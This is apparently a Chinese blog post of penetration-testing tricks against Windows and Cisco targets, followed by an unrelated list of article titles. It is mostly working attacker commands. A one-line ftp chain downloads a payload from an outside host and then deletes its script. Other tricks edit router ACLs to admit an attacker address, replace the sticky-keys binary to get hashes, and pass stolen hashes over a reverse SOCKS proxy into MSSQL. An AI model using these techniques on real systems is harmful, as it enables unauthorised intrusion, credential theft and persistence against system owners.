渗透测试技巧分享
1.AT時提示綁定句柄無效
經常碰到的這個問題,百度搜索的全部都沒一個能解決的。
正確的解決辦法是先在地址欄\1.1.1.1 得到對方機器名,例如ADMINPC,然後,CMD
echo 1.1.1.1 ADMINPC >>C:windowssystem32driversetchosts
然後就可以at了,再也不會提示句柄無效了。
後記:其實也不需要對方的機器名,隨便echo 一個字符代替機器名即可。
2.ftp 一句話download
以前都是一個一個echo,然後ftp-s,很不方便,用下面的辦法吧
echo open 10.0.0.1> o&echo user 11>> o &echo get 3389.exe>> o &echo quit >> o &ftp -n -s:o &del /F /Q o
3.針對VISTA以上作業系統禁用NTHASH
高級系統默認都是禁止了LMHASH,在滲透途中是件很不方便的事,按照下圖可以啟動LMHASH,不過需要更改密碼后生效,如果用戶不更改密碼,LMHASH不會儲存,適用于比較敏感的目標,沒事天天改密碼的類型。這辦法適用於無WCE的時代.
捕获.gif(缩略图)
4. 修改cisco access list 避免繁瑣的”佛跳牆”過程
ssh 登陸IP,x.x.x.x
登陸
en IPE_CISCO#show access-list 查看下要配置的list 例如需要訪問的服務器在VLAN103 IPE_CISCO#config IPE_CISCO#terminal IPE_CISCO#access-list 103 permit host 10.1.6.66 //允許這個IP訪問VLAN103所有的伺服器 IPE_CISCO#int vlan 103 IPE_CISCO#ip access-group 103 out IPE_CISCO#exit
5.BKF文件的利用
Webshell 環境下,提權無門,發現一BKF,Copy Downlaod,虛擬機還原,WINPE 替換shift,get hash
然後去試試目標的pass.
6.基於替換系統hash的SQL 入侵
已知目標系統HASH:
administrator:zhu:00000000000000000000000000000000:4A59CF37F6xxxxxx
系統OS:2003,SQLSERVER 2008,目測該hash超過14位。(2003 默認為LMHASH,密碼超過14位則全000000000或者AA3DXXX)
已有webshell,提權無門,則通過Htran 反彈一條sock5代理,本地WCE替換為目標HASH,使用sock5代理連接MSSQL,認證選擇NT。
連上,完成。
7.注意Command.com
這個命令存在很久了在遙遠的WIN95~WIN2003一直存在著,一直被忽略的對象,其實,它也能替代CMD。
8.當ipc$遇到帶“號密碼時
password is:O*"#~)GbU[x net use \127.0.0.1 "O*"#~)GbU[x" /u:administrator
“號前加即可解決問題。
- Cnm%(个人模版)
- Selenium2+python自动化33-文件上传(send_keys)
- hive的partition的作用和使用方法
- 线段树,最大值查询位子(个人模版)
- set使用实例1+lower_bound(val)(个人模版)
- Selenium2+python自动化29-js处理多窗口
- 谷歌「机弦」有何玄机?
- 01字典树贪心查询+建立+删除(个人模版)
- 优先队列(个人模版)
- Numpy教程第2部分 - 数据分析的重要功能
- 最小表示法(个人模版)
- 基于Python-ChatterBot搭建不同adapter的聊天机器人(使用NB进行场景分类)
- 并查集(个人模版)
- Markdown 语法和 MWeb 写作使用说明既然都整理了,捎带手把这个也整理了吧第一级标题<h1>
- JavaScript 教程
- JavaScript 编辑工具
- JavaScript 与HTML
- JavaScript 与Java
- JavaScript 数据结构
- JavaScript 基本数据类型
- JavaScript 特殊数据类型
- JavaScript 运算符
- JavaScript typeof 运算符
- JavaScript 表达式
- JavaScript 类型转换
- JavaScript 基本语法
- JavaScript 注释
- Javascript 基本处理流程
- Javascript 选择结构
- Javascript if 语句
- Javascript if 语句的嵌套
- Javascript switch 语句
- Javascript 循环结构
- Javascript 循环结构实例
- Javascript 跳转语句
- Javascript 控制语句总结
- Javascript 函数介绍
- Javascript 函数的定义
- Javascript 函数调用
- Javascript 几种特殊的函数
- JavaScript 内置函数简介
- Javascript eval() 函数
- Javascript isFinite() 函数
- Javascript isNaN() 函数
- parseInt() 与 parseFloat()
- escape() 与 unescape()
- Javascript 字符串介绍
- Javascript length属性
- javascript 字符串函数
- Javascript 日期对象简介
- Javascript 日期对象用途
- Date 对象属性和方法
- Javascript 数组是什么
- Javascript 创建数组
- Javascript 数组赋值与取值
- Javascript 数组属性和方法
- 常用功能加载宏——单元格区域数据交换
- 窗体UserForm——我也是类
- OpenCV与图像处理(四)
- 常用功能加载宏——单元格数据连接
- Nest.js 从零到壹系列(八):使用 Redis 实现登录挤出功能
- 创建常用功能加载宏
- 3分钟短文 | Linux 使用curl发起post请求的4个常用方式
- 类模块——接口
- OpenCV与图像处理(三)
- 常用功能加载宏——单元格数字转变
- OpenCV与图像处理(二)
- ECCV2020 | SOD100K:超低参数量的高效显著性目标检测算法,广义OctConv和动态权重衰减
- Rust FFI 编程 - Rust导出共享库02
- 常用功能加载宏——单元格数字格式
- 【翻译】200行代码讲透RUST FUTURES (2)